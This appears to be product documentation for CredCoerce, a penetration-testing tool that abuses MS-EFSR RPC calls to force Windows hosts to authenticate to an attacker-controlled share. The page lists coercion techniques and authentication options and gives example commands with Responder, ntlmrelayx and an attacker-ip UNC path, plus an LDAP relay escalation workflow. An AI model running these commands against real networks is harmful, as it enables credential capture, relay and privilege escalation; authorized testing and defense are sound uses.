Skip to main content
CredCoerce sends RPC calls to a target Windows system that cause it to initiate an outbound authentication attempt to a path you control. You capture or relay the resulting credentials with a listener such as Responder or ntlmrelayx. This technique is commonly used in internal penetration tests to move laterally or escalate privileges.

Synopsis

CredCoerce [options] -Techniques <ComponentSelector[]> <ServerName> <VictimPath>

Parameters

ServerName
string
required
Hostname or IP address of the target system to coerce.
VictimPath
string
required
UNC path or resource path to embed in the RPC call. The target system will attempt to access this path, triggering an outbound authentication to the host in the path (e.g., \\attacker-ip\share).

Options

-Techniques
ComponentSelector[]
required
One or more coercion techniques to attempt. Use * to try all available techniques. See the table below for all supported values.
-ConsoleOutputStyle (-OutputStyle)
string
Output format: Freeform, Raw, Table, List, Csv, Tsv, Json.
-SpnOverride
string
Override the SPN used during authentication.
-Socks5
string
SOCKS5 proxy endpoint (host:port).

Coercion techniques

All available techniques use the MS-EFSR (Encrypting File System Remote) RPC interface.
TechniqueInterfaceDescription
*Attempt all available techniques
Efs.OpenFileMS-EFSRCall EfsRpcOpenFileRaw with the victim path
Efs.EncryptFileMS-EFSRCall EfsRpcEncryptFileSrv with the victim path
Efs.DecryptFileMS-EFSRCall EfsRpcDecryptFileSrv with the victim path
Efs.QueryUsersOnFileMS-EFSRCall EfsRpcQueryUsersOnFile with the victim path
Efs.QueryRecoveryAgentsMS-EFSRCall EfsRpcQueryRecoveryAgents with the victim path
Efs.RemoveUsersFromFileMS-EFSRCall EfsRpcRemoveUsersFromFile with the victim path
Efs.AddUsersToFileMS-EFSRCall EfsRpcAddUsersToFile with the victim path
Efs.FileKeyInfoMS-EFSRCall EfsRpcFileKeyInfo with the victim path
Efs.DuplicateEncryptionInfoFileMS-EFSRCall EfsRpcDuplicateEncryptionInfoFile with the victim path
Efs.AddUsersToFileExMS-EFSRCall EfsRpcAddUsersToFileEx with the victim path
Efs.FileKeyInfoExMS-EFSRCall EfsRpcFileKeyInfoEx with the victim path
Efs.GetEncryptedFileMetadataMS-EFSRCall EfsRpcGetEncryptedFileMetadata with the victim path
Efs.SetEncryptedFileMetadataMS-EFSRCall EfsRpcSetEncryptedFileMetadata with the victim path
Efs.EncryptFileExSrvMS-EFSRCall EfsRpcEncryptFileExSrv with the victim path

Authentication

-UserName (-u)
string
User name (without domain) to authenticate to the target with.
-UserDomain (-ud)
string
Domain of the authenticating user.
-Password (-p)
string
Password.
-NtlmHash
string
NTLM hash for pass-the-hash authentication.
-Anonymous
boolean
Use anonymous authentication.
-AesKey
string
AES-128 or AES-256 Kerberos session key.
-Tgt
string
TGT file path (.kirbi or ccache format).
-Kdc (-K)
string
KDC endpoint (host:port).
-S4UserName
string
User to impersonate via S4U2self.
-HostAddress (-ha)
string[]
Override network address(es) of the server.
-UseTcp6Only (-6)
boolean
Use TCP over IPv6 only.
-UseTcp4Only (-4)
boolean
Use TCP over IPv4 only.

Examples

1

Start a credential listener

On your attacker machine, start a listener to capture or relay credentials:
# Using Responder (capture)
responder -I eth0

# Or using ntlmrelayx (relay)
ntlmrelayx.py -t smb://target-ip
2

Coerce authentication with all EFS techniques

CredCoerce -UserName milchick@LUMON -Password Br3@kr00m! -Techniques * LUMON-FS1 \\\\attacker-ip\\share
The target (LUMON-FS1) attempts to authenticate to \\attacker-ip\share, which your listener captures.
3

Try a specific technique

CredCoerce -UserName milchick@LUMON -Password Br3@kr00m! -Techniques Efs.OpenFile LUMON-FS1 \\\\attacker-ip\\share
4

Authenticate to the target using Kerberos

CredCoerce -Kdc 10.66.0.11 -AesKey <hex-aes-key> -Techniques * LUMON-FS1 \\\\attacker-ip\\share
Credential coercion triggers real outbound network connections from the target system. Ensure your engagement authorizes this activity and that you control the listener receiving the credentials.

Common usage patterns

Coerce a domain controller or privileged machine to authenticate to an LDAP relay, which can be used to add privileges:
  1. Start ntlmrelayx targeting LDAP on another domain controller.
  2. Run CredCoerce against the victim machine with a path pointing to your relay listener.
  3. The relay authenticates to LDAP on your behalf and performs the privileged operation.
When the target is a computer account (rather than a user), the outbound authentication uses the machine account credentials. These Net-NTLM hashes can be cracked offline or relayed to services that accept machine account authentication.

Build docs developers (and LLMs) love

Get started for freeTalk to us